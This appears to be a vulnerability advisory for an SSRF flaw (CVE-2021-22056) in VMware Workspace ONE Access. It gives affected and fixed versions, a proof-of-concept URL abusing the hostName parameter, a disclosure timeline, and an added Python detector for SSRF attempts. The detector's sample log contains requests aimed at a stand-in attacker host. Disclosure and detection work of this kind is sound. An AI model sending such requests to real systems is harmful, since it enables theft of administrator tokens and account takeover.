Advisory: VMware Workspace ONE Access (CVE-2021-22056)

Jan 17, 2022


When authenticated as an administrator in VMware Workspace ONE Access, it is possible to make the server send HTTP requests to arbitrary URLs and to read the full HTTP response to those requests. These server-side requests carry an Authorization header containing an admin-level JWT.


Due to a missing slash character, an attacker can make the server send HTTP requests to arbitrary origins and read the full response. Furthermore, because the Authorization header is sent along with these requests, the vulnerability can be weaponized to steal an administrator's authorization header as soon as the administrator views an image or makes a single click.
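The behaviour described above leaves a simple trace: every server-side request is triggered by a client request to the instanceHealth endpoint, with the target in the hostName parameter. The following Python helper is an added example and is not code from the advisory or from VMware. It assumes the appliance's web access log is in the combined log format and that the defender knows the appliance's legitimate hostname(s); the log lines embedded below are constructed for the example. Any hostName that is not a plain DNS name pointing back at the appliance itself is reported, and the same check can serve as the input validation a patched endpoint should apply.

```python
"""Detection helper for SSRF attempts against the Workspace ONE Access
instanceHealth endpoint (CVE-2021-22056 shape).

Added example, not part of the Assetnote advisory. Assumptions: access log
lines are in combined log format, and expected_hosts holds the appliance's own
hostname(s). SAMPLE_LOG is constructed, not captured from a real system.
"""
import re
from urllib.parse import parse_qs, urlsplit

INSTANCE_HEALTH_PATH = "/SAAS/API/1.0/REST/system/health/instanceHealth"

# One combined-format access log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# A hostName value that is only a DNS name, optionally with a port.
# Anything containing '/', '@', '#', '?', whitespace or other URL
# metacharacters fails this pattern.
HOSTNAME_RE = re.compile(
    r'^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    r'(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*'
    r'(:\d{1,5})?$'
)


def is_expected_hostname(value: str, expected_hosts: set) -> bool:
    """True only if value is a plain DNS name (optional :port) naming the
    appliance itself. Rejecting metacharacters before the allowlist lookup
    means the comparison never sees a value that could steer a URL elsewhere."""
    if not HOSTNAME_RE.match(value):
        return False
    host = value.split(":", 1)[0].lower()
    return host in {h.lower() for h in expected_hosts}


def find_ssrf_attempts(log_lines, expected_hosts):
    """Return (client, hostName, status) for every instanceHealth request
    whose hostName does not point back at the appliance."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != INSTANCE_HEALTH_PATH:
            continue
        # parse_qs percent-decodes, so an encoded '%2F' is inspected as '/'.
        for value in parse_qs(parts.query).get("hostName", []):
            if not is_expected_hostname(value, expected_hosts):
                hits.append((m.group("client"), value, int(m.group("status"))))
    return hits


# Constructed sample log: one legitimate check, two suspicious ones, one
# unrelated request under the same path prefix.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jan/2022:10:00:01 +0000] "GET '
    '/SAAS/API/1.0/REST/system/health/instanceHealth?hostName=access.reverse.test '
    'HTTP/1.1" 200 512',
    '203.0.113.7 - - [17/Jan/2022:10:00:09 +0000] "GET '
    '/SAAS/API/1.0/REST/system/health/instanceHealth?hostName=collector.attacker.example '
    'HTTP/1.1" 200 2048',
    '203.0.113.7 - - [17/Jan/2022:10:00:12 +0000] "GET '
    '/SAAS/API/1.0/REST/system/health/instanceHealth?hostName=collector.attacker.example%2FSAAS%2F '
    'HTTP/1.1" 200 2048',
    '10.0.0.5 - - [17/Jan/2022:10:00:20 +0000] "GET '
    '/SAAS/API/1.0/REST/system/health/ HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, host, status in find_ssrf_attempts(SAMPLE_LOG, {"access.reverse.test"}):
        print(f"suspicious instanceHealth request from {client}: hostName={host!r} status={status}")
```

Run against the constructed sample, only the two requests from 203.0.113.7 are reported; the legitimate check against the appliance's own name passes. On a real deployment, feed the appliance's access log and its own hostname(s) to find_ssrf_attempts, and treat a 200 response on a flagged line as a sign that the server-side request completed and its response was returned to the caller.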

Version Tested Against

identity-manager - 20.01

Admin token disclosure affects 20.01, but not later versions.

Later versions are still vulnerable to the SSRF vulnerability.

Product Description

Workspace ONE Access (formerly VMware Identity Manager) provides multi-factor authentication, conditional access and single sign-on to SaaS, web and native mobile apps.


VMware’s advisory can be found here.

As per VMware’s advisory, the following versions are considered fixed:

Fixed Version:

VMware Workspace ONE Access

VMware Workspace ONE Access 21.08, 20.10


VMware Identity Manager (vIDM) 3.3.5, 3.3.4, 3.3.3


Proof of Concept

https://access.reverse.test/SAAS/API/1.0/REST/system/health/instanceHealth?hostName=access.reverse.test&[email protected]

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.


Credit

Assetnote Security Research Team and Keiran Sampson


The timeline for this disclosure process can be found below:

  • Oct 5th, 2021: Disclosure of account takeover via post-auth SSRF
  • Oct 5th, 2021: Response from VMware confirming receipt of the vulnerability
  • Nov 9th, 2021: Assetnote Security Research Team requests an update on the issue
  • Nov 12th, 2021: Response from VMware confirming that the vulnerability is being worked on
  • Dec 8th, 2021: Assetnote Security Research Team requests an update on the issue
  • Dec 8th, 2021: Response from VMware confirming they could reproduce the SSRF but not the admin token disclosure on the latest version of Workspace ONE Access
  • Dec 10th, 2021: Response from VMware confirming progress is being made on fixes
  • Dec 17th, 2021: VMware publishes advisory
